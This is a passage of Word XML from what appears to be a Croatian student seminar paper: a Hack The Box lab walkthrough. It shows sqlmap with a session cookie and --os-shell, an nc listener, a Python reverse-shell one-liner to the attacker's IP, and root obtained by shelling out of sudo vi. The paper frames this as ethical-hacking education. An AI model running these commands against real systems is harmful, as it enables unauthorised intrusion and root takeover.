    <w:p w14:paraId="0056328F" w14:textId="77777777" w:rsidR="00036E9B" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:t xml:space="preserve">Nakon toga pozicioniramo se u novonastali direktorij sql-a te konstruiramo SQL upit naredbom </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9356B2" w14:textId="02C34A05" w:rsidR="00036E9B" w:rsidRDefault="00036E9B" w:rsidP="00036E9B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t>$ python3 sqlmap.py –u 'http://10.10.10.46/dashboard.php?search=a' --cookie=“PHPSESSID=m5741pcrotaqbqo9kkpca2tbmu“ --os-shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518C992F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297F61D7" wp14:editId="16D946DB">
            <wp:extent cx="5753100" cy="3181350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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8C33" w14:textId="3F1F03C3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42. SQL upit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6358381F" w14:textId="77777777" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:t xml:space="preserve">Konstruiranje SQL upita traje određeno vrijeme i po završetku prelazimo u sučelje shell-a (u prethodnom koraku smo zatražili prelazak dodatkom naredbi --os-shell). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6DF4EC" w14:textId="77777777" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="hr-HR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="287FF98E" wp14:editId="509586B0">
            <wp:extent cx="5762625" cy="2371725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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9DEA4" w14:textId="0B3063EA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43. Shell sučelje</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBF42C5" w14:textId="77777777" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:t>Naredbom 'whoami' provjeravamo trenutnog korisnika koji koristi sučelje.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6397BFF3" w14:textId="3C87D5FA" w:rsidR="003624D6" w:rsidRDefault="003624D6" w:rsidP="00567BD3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:r w:rsidR="00567BD3">
        <w:t>-shell&gt; whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D716FE2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135D006E" wp14:editId="4485B39D">
            <wp:extent cx="5762625" cy="1847850"/>
            <wp:effectExtent l="0" t="0" r="9525" b="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15A8" w14:textId="446E0BF9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44. Whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F19EBB" w14:textId="77777777" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:t>Zatim provjeravamo koju verziju python-a koristimo na trenutnom sučelju shell-a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BAB07B" w14:textId="4AB61189" w:rsidR="003624D6" w:rsidRDefault="003624D6" w:rsidP="003624D6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t>os-shell&gt; which python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05633777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29DB8926" wp14:editId="2CB9C777">
            <wp:extent cx="5753100" cy="1457325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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874D" w14:textId="308000B7" w:rsid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45. Python?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4228A1DA" w14:textId="77777777" w:rsidR="00567BD3" w:rsidRPr="00463018" w:rsidRDefault="00567BD3" w:rsidP="00463018">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45CB8E75" w14:textId="58486720" w:rsidR="003624D6" w:rsidRDefault="003624D6" w:rsidP="003624D6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>os-shell&gt; which python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017A8239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5989214D" wp14:editId="046498CD">
            <wp:extent cx="5762625" cy="2819400"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0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B2C0" w14:textId="48FF88A3" w:rsidR="003624D6" w:rsidRPr="00567BD3" w:rsidRDefault="00463018" w:rsidP="00567BD3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46. Pytho</w:t>
      </w:r>
      <w:r w:rsidR="00567BD3">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>n3?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA90F56" w14:textId="77777777" w:rsidR="003624D6" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:t>Otvaramo novi command prompt i naredbom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D632106" w14:textId="639E8FF1" w:rsidR="003624D6" w:rsidRDefault="003624D6" w:rsidP="003624D6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t>$ nc –lvnp 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31323FDF" w14:textId="571A3089" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:t>pratimo promet na portu 443.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC915A4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3EDDEDE7" wp14:editId="62FC842B">
            <wp:extent cx="5753100" cy="819150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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274C" w14:textId="553336ED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47. Promet na portu 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0045AE" w14:textId="77777777" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:t>Na shell sučelju uvozimo library socket, subprocess, os i spajamo se na port 443 sa pripadajućom ip adresom našeg računala.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A88CD9" w14:textId="3F610D73" w:rsidR="002F0025" w:rsidRDefault="002F0025" w:rsidP="002F0025">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t>os-shell&gt; python3 –c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((„10.10.14.165“,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(„/bin/bash“)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7E1175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0C6749E1" wp14:editId="7189F18F">
            <wp:extent cx="5762625" cy="1028700"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0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890C" w14:textId="19EB20C2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48. Import socket,subprocess,os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB744F8" w14:textId="22469D48" w:rsidR="00EE410A" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sada je na portu 443 vidljivo da je spajanje uspjelo i da možemo pristupiti svim podatcima postgres korisnika.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01965228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5404FD53" wp14:editId="5E773516">
            <wp:extent cx="5762625" cy="1981200"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"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7748" w14:textId="721D220D" w:rsid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 xml:space="preserve">Slika 49. Port 443 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7B2029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1D8DB9A3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6117558A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5739793B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52ECAE10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5CDE8FA6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6139CC76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0165C00F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3785B639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1FAC7A15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36D4409C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07BF775E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57530AB1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27CE1553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0A0C9E76" w14:textId="77777777" w:rsidR="00567BD3" w:rsidRDefault="00567BD3" w:rsidP="00463018">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2127DD66" w14:textId="77777777" w:rsidR="00567BD3" w:rsidRDefault="00567BD3" w:rsidP="00463018">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1165654E" w14:textId="77777777" w:rsidR="00567BD3" w:rsidRDefault="00567BD3" w:rsidP="00463018">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79EC0D3E" w14:textId="77777777" w:rsidR="00567BD3" w:rsidRDefault="00567BD3" w:rsidP="00463018">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FC4EE4B" w14:textId="77777777" w:rsidR="00567BD3" w:rsidRDefault="00567BD3" w:rsidP="00463018">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2814CFA5" w14:textId="77777777" w:rsidR="00CE08FC" w:rsidRDefault="00CE08FC" w:rsidP="00463018">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32039E11" w14:textId="5EF1C1A0" w:rsidR="007D315D" w:rsidRPr="007D315D" w:rsidRDefault="00CE08FC" w:rsidP="007D315D">
      <w:pPr>
        <w:pStyle w:val="Naslov2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc75785399"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Privilege Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="419FDDC5" w14:textId="77777777" w:rsidR="007D315D" w:rsidRDefault="00CE08FC" w:rsidP="00463018">
      <w:r>
        <w:t>Ušli smo u posljednju fazu u kojoj ćemo pristupiti najvećim 'sudo' ovlastima korisnika.</w:t>
      </w:r>
      <w:r w:rsidR="007D315D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1F128D" w14:textId="2D0B9FF1" w:rsidR="00463018" w:rsidRDefault="00CE08FC" w:rsidP="00463018">
      <w:r>
        <w:t xml:space="preserve">Prvo </w:t>
      </w:r>
      <w:r w:rsidR="00463018">
        <w:t>trebamo saznati lozinku od postgres-a koja se nalazi u direktoriju /var/www/html/dashboard.php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291760F3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1E3C8854" wp14:editId="39DA08FD">
            <wp:extent cx="5762625" cy="790575"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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06D3" w14:textId="3B6F4720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50. Lozinka postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE57722" w14:textId="77777777" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:t>Poznavanjem lozinke od postgres-a možemo saznati sve korisnikove 'sudo' privilegije. Isto tako možemo i promijeniti privilegije pristupanjem konfiguraciji pg_hba.conf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DDC786" w14:textId="3662ED29" w:rsidR="00EE410A" w:rsidRDefault="00EE410A" w:rsidP="00EE410A">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t>$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A18532E" w14:textId="77777777" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="hr-HR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A0A703E" wp14:editId="7D8CB96E">
            <wp:extent cx="5762625" cy="2943225"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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EC71" w14:textId="1B7CAC78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51. Unos lozinke postgres i pristup konfiguraciji za privilegije</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C311291" w14:textId="77777777" w:rsidR="00EE410A" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="hr-HR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="hr-HR"/>
        </w:rPr>
        <w:t>Naredbom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2F7107" w14:textId="71F475D1" w:rsidR="00EE410A" w:rsidRDefault="00EE410A" w:rsidP="00EE410A">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t>$ :!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEA97FF" w14:textId="5EC2CE32" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="hr-HR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="hr-HR"/>
        </w:rPr>
        <w:t>pristupamo root-u i imamo najveće 'sudo' privilegije.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D5EF86" w14:textId="77777777" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="hr-HR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CFC0388" wp14:editId="669D750A">
            <wp:extent cx="5753100" cy="2038350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="53" name="Slik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B202" w14:textId="5CAC49C7" w:rsidR="00463018" w:rsidRPr="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00463018">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Slika 52. Pristup root-u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A939AF" w14:textId="77777777" w:rsidR="006A4EBE" w:rsidRDefault="006A4EBE" w:rsidP="006A4EBE"/>
    <w:p w14:paraId="36769D47" w14:textId="77777777" w:rsidR="006A4EBE" w:rsidRDefault="006A4EBE" w:rsidP="006A4EBE"/>
    <w:p w14:paraId="7F7C78C4" w14:textId="3375F3B5" w:rsidR="006A4EBE" w:rsidRDefault="006A4EBE" w:rsidP="006A4EBE">
      <w:pPr>
        <w:pStyle w:val="Naslov1"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc75785400"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Zaključak</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="01B9950D" w14:textId="2823CE06" w:rsidR="00171FB0" w:rsidRDefault="00D67709" w:rsidP="00B462F9">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00B462F9">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Hakeri su često opisani </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">u medijima kao kriminalci. Često ih se zamjenjuje s piscima virusa i uljezima koji upadaju u informacijske sustave. </w:t>
      </w:r>
      <w:r w:rsidR="00B462F9">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>No h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">akeri su osobe koji vole kroz pozitivnu znatiželju istraživati granice onoga što je moguće, to često uključuje prepravljanje postojećih hardverskih i softverskih rješenja kako bi dobila </w:t>
      </w:r>
      <w:r w:rsidR="00B462F9">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>funkciju</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> ili otključala neku skrivenu.</w:t>
      </w:r>
      <w:r w:rsidR="00B462F9">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4A6B69" w14:textId="77777777" w:rsidR="00B462F9" w:rsidRDefault="00B462F9" w:rsidP="00B462F9">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Hakiranje ne mora nužno biti loše. Uzmite na primjer hakiranje prikazano u ovom seminaru. Ako se želite uvjeriti da su vaše računalo, stranica ili server sigurni od zlonamjernih napadača te </w:t>
      </w:r>
      <w:r w:rsidRPr="00B462F9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>bot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">-ova koji neprestano traže sigurnosne propuste po Internetu, onda je pametno unajmiti etičnog hakera koji će napraviti provjeru sustava za vas. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A38CE2" w14:textId="7A79FFBA" w:rsidR="00B462F9" w:rsidRDefault="00B462F9" w:rsidP="00B462F9">
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Hack The Box je izvrsna platforma za mlade programere koji se žele jednog dana baviti etičnim hakiranjem jer im daje mogućnost mnogo toga naučiti i pri tom ih zabaviti. Bio je užitak raditi na ovom seminarskom radu te se nadam da smo uspjeli približiti metode hakiranja.    </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B462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41A21"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1FA426F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81906"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="041A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BE"/>
    <w:rsid w:val="00010B7E"/>
    <w:rsid w:val="00021573"/>
    <w:rsid w:val="00036E9B"/>
    <w:rsid w:val="000C4BDF"/>
    <w:rsid w:val="00171FB0"/>
    <w:rsid w:val="001C0708"/>
    <w:rsid w:val="00204A40"/>
    <w:rsid w:val="0021519D"/>
    <w:rsid w:val="00217F6A"/>
    <w:rsid w:val="00225B28"/>
    <w:rsid w:val="002A3DDF"/>
    <w:rsid w:val="002F0025"/>
    <w:rsid w:val="00304607"/>
    <w:rsid w:val="0034549B"/>
    <w:rsid w:val="00356B16"/>
    <w:rsid w:val="003624D6"/>
    <w:rsid w:val="003D7C18"/>
    <w:rsid w:val="003E14C2"/>
    <w:rsid w:val="0043159E"/>
    <w:rsid w:val="004459AD"/>
    <w:rsid w:val="004472D0"/>
    <w:rsid w:val="00463018"/>
    <w:rsid w:val="004A0873"/>
    <w:rsid w:val="004B1F20"/>
    <w:rsid w:val="004C3692"/>
    <w:rsid w:val="004C6563"/>
    <w:rsid w:val="004E68C1"/>
    <w:rsid w:val="00567BD3"/>
    <w:rsid w:val="0057499E"/>
    <w:rsid w:val="005C3744"/>
    <w:rsid w:val="005E2A9B"/>
    <w:rsid w:val="00655239"/>
    <w:rsid w:val="006A4EBE"/>
    <w:rsid w:val="006C3EC9"/>
    <w:rsid w:val="00793500"/>
    <w:rsid w:val="007B6900"/>
    <w:rsid w:val="007D315D"/>
    <w:rsid w:val="008172B2"/>
    <w:rsid w:val="0083791F"/>
    <w:rsid w:val="0086397C"/>
    <w:rsid w:val="008A46DE"/>
    <w:rsid w:val="00934057"/>
    <w:rsid w:val="00942E63"/>
    <w:rsid w:val="0095193D"/>
    <w:rsid w:val="00976554"/>
    <w:rsid w:val="00980016"/>
    <w:rsid w:val="009859E6"/>
    <w:rsid w:val="009D650E"/>
    <w:rsid w:val="00A26C72"/>
    <w:rsid w:val="00A80EEE"/>
    <w:rsid w:val="00A8218F"/>
    <w:rsid w:val="00A96E98"/>
    <w:rsid w:val="00B37906"/>
    <w:rsid w:val="00B462F9"/>
    <w:rsid w:val="00B900EA"/>
    <w:rsid w:val="00BD032A"/>
    <w:rsid w:val="00C25259"/>
    <w:rsid w:val="00C4523F"/>
    <w:rsid w:val="00C66C3B"/>
    <w:rsid w:val="00CE08FC"/>
    <w:rsid w:val="00D506D1"/>
    <w:rsid w:val="00D5333E"/>
    <w:rsid w:val="00D67709"/>
    <w:rsid w:val="00DB5EAD"/>
    <w:rsid w:val="00E11CAF"/>
    <w:rsid w:val="00E120B5"/>
    <w:rsid w:val="00E35BBA"/>
    <w:rsid w:val="00E558FF"/>
    <w:rsid w:val="00E602CA"/>
    <w:rsid w:val="00E62C57"/>
    <w:rsid w:val="00E828A3"/>
    <w:rsid w:val="00E87A78"/>
    <w:rsid w:val="00E90794"/>
    <w:rsid w:val="00EE410A"/>
    <w:rsid w:val="00F9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13445"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8522DABD-ECC8-4475-B78A-3432334C7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EBE"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:sz w:val="24"/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6A4EBE"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:pageBreakBefore/>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:ind w:left="431" w:hanging="431"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b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6A4EBE"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6A4EBE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i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6A4EB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6A4EB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6A4EB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6A4EB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6A4EB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6A4EB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6A4EBE"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="hr-HR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Naslov2Char">
    <w:name w:val="Naslov 2 Char"/>
    <w:basedOn w:val="Zadanifontodlomka"/>
    <w:link w:val="Naslov2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="006A4EBE"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="hr-HR"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6A4EBE"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:i/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="hr-HR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6A4EBE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hr-HR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6A4EBE"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="24"/>
      <w:lang w:val="hr-HR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6A4EBE"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:lang w:val="hr-HR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6A4EBE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hr-HR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6A4EB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hr-HR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6A4EB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hr-HR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Opisslike">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003D7C18"/>
    <w:pPr>
      <w:spacing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veza">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Zadanifontodlomka"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006A4EBE"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCNaslov">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Naslov1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="006A4EBE"/>
    <w:pPr>
      <w:pageBreakBefore w:val="0"/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6A4EBE"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="259" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="22"/>
      <w:lang w:eastAsia="hr-HR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Nerijeenospominjanje1">
    <w:name w:val="Neriješeno spominjanje1"/>
    <w:basedOn w:val="Zadanifontodlomka"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E62C57"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SlijeenaHiperveza">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="Zadanifontodlomka"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E62C57"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sadraj2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C66C3B"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="240"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Code">
    <w:name w:val="Code"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00BD032A"/>
    <w:pPr>
      <w:framePr w:hSpace="567" w:vSpace="567" w:wrap="around" w:vAnchor="text" w:hAnchor="text" w:y="1"/>
